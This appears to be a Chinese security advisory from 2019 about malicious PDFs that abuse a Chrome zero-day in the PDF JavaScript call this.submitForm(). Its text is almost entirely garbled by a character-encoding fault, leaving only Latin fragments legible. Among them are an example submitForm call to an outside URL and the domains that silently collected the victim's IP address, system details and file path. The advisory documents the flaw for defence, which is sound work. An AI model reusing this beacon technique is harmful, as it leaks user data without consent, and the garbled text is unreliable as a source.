¶ñÒâPDFÎļþʹÓÃChromeä¯ÀÀÆ÷0dayÎó²îÇ徲ͨ¸æ
Ðû²¼Ê±¼ä 2019-03-01Îó²î±àºÅºÍ¼¶±ð
CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬£¬ CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨
Ó°Ïì¹æÄ£
ÊÜÓ°Ïì°æ±¾£º
Google Chromeä¯ÀÀÆ÷ËùÓа汾
Îó²î¸ÅÊö
½üÆÚ£¬£¬£¬£¬£¬À´×ÔÍâÑóµÄÇå¾²Ñо¿Ö°Ô±ÔÚÒ°Íâ¼ì²âµ½¶à¸öPDF¶ñÒâÑù±¾¡£¡£¡£¡£¡£¡£¡£ÕâЩÑù±¾Ê¹ÓÃÁËChromeä¯ÀÀÆ÷µÄ0dayÎó²î£¬£¬£¬£¬£¬ÒÔʵÏÖ×·×ÙÓû§²¢ÇÄÇÄÄ³Ð©ÍøÂçÓû§ÐÅÏ¢µÄÄ¿µÄ¡£¡£¡£¡£¡£¡£¡£
ÏÖÔÚ·¢Ã÷ÁËÁ½×éʹÓÃChromeÁãÈÕÎó²îµÄ¶ñÒâPDFÎļþ£¬£¬£¬£¬£¬ÆäÖÐÒ»×éÎļþÔÚ2017Äê10ÔÂÈö²¥£¬£¬£¬£¬£¬ÁíÒ»×éÎļþÔÚ2018Äê9ÔÂÈö²¥¡£¡£¡£¡£¡£¡£¡£µÚÒ»Åú¶ñÒâPDFÎļþ½«Óû§Êý¾Ý·¢Ëͻء°readnotify.com¡±£¬£¬£¬£¬£¬µÚ¶þÅú·¢Ëͻء°zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net¡±¡£¡£¡£¡£¡£¡£¡£
Îó²îµÄȪԴÔÚÓÚthis.submitForm()Õâ¸öPDF Javascript API¡£¡£¡£¡£¡£¡£¡£Ïñthis.submitForm('http://google.com/test')ÕâÑùÒ»¸ö¼òÆÓµÄŲÓþͻᵼÖÂChrome°ÑСÎÒ˽¼ÒÐÅÏ¢·¢Ë͵½google.com¡£¡£¡£¡£¡£¡£¡£¿£¿£¿£¿£¿ÉÄܱ»Ð¹Â¶µÄÐÅÏ¢°üÀ¨£º
1.Óû§µÄ¹«¹²IPµØµã¡£¡£¡£¡£¡£¡£¡£
2.²Ù×÷ϵͳ£¬£¬£¬£¬£¬Chrome°æ±¾µÈ(ÔÚHTTP POST headerÖÐ)¡£¡£¡£¡£¡£¡£¡£
3.Óû§ÅÌËã»úÉÏPDFÎļþµÄÍêÕû·¾¶(ÔÚHTTP POST payloadÖÐ)¡£¡£¡£¡£¡£¡£¡£
µ±Óû§Ê¹ÓÃChromeä¯ÀÀÆ÷·¿ªÕâЩ¶ñÒâÑù±¾Ê±£¬£¬£¬£¬£¬Ñù±¾»áÔËÐжñÒâ´úÂ룬£¬£¬£¬£¬ÔÚδ¾Óû§Åú×¼µÄÇéÐÎÏ£¬£¬£¬£¬£¬ÒÔHTTP POSTÊý¾Ý°üµÄÐÎʽ½«Ò»Ð©Óû§ÐÅÏ¢¾²Ä¬·¢Ë͵½Ö¸¶¨Óò¡°readnotify.com ¡±¡£¡£¡£¡£¡£¡£¡£
³ýÈ¥ÐÅϢй¶ÒÔÍ⣬£¬£¬£¬£¬¸ÃÎó²îÔÝδ·¢Ã÷ÆäËüʹÓ÷½·¨£¬£¬£¬£¬£¬µ«ºÁÎÞÒÉÎÊ£¬£¬£¬£¬£¬ÕâЩй¶µÄÓû§ÐÅÏ¢¿ÉÒÔ×ÊÖú¹¥»÷Õß¾ÙÐиü¶à»î¶¯¡£¡£¡£¡£¡£¡£¡£
ÐÞ¸´½¨Òé
ÏÖÔÚ¸Ã0dayÎó²îÉÐδÓйٷ½²¹¶¡£¬£¬£¬£¬£¬µ«ChromeÍŶӻòÐí½«ÓÚ4ÔÂβÐÞ¸´¸ÃÎó²î¡£¡£¡£¡£¡£¡£¡£
ÔÝʱ»º½â²½·¥£º
ÔÚ²¹¶¡Ðû²¼Ö®Ç°£¬£¬£¬£¬£¬½¨ÒéÓû§Ê¹ÓÃPDFÔĶÁÆ÷Ó¦ÓóÌÐòÔÚÍâµØÉó²éPDFÎĵµ£¬£¬£¬£¬£¬Ö±µ½ChromeÐÞ¸´Îó²î¡£¡£¡£¡£¡£¡£¡£»£»£»£»òÔÚChromeÖз¿ªPDFÎĵµÊ±¶Ï¿ªÅÌËã»úÓëInternetµÄÅþÁ¬¡£¡£¡£¡£¡£¡£¡£
²Î¿¼Á´½Ó
https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html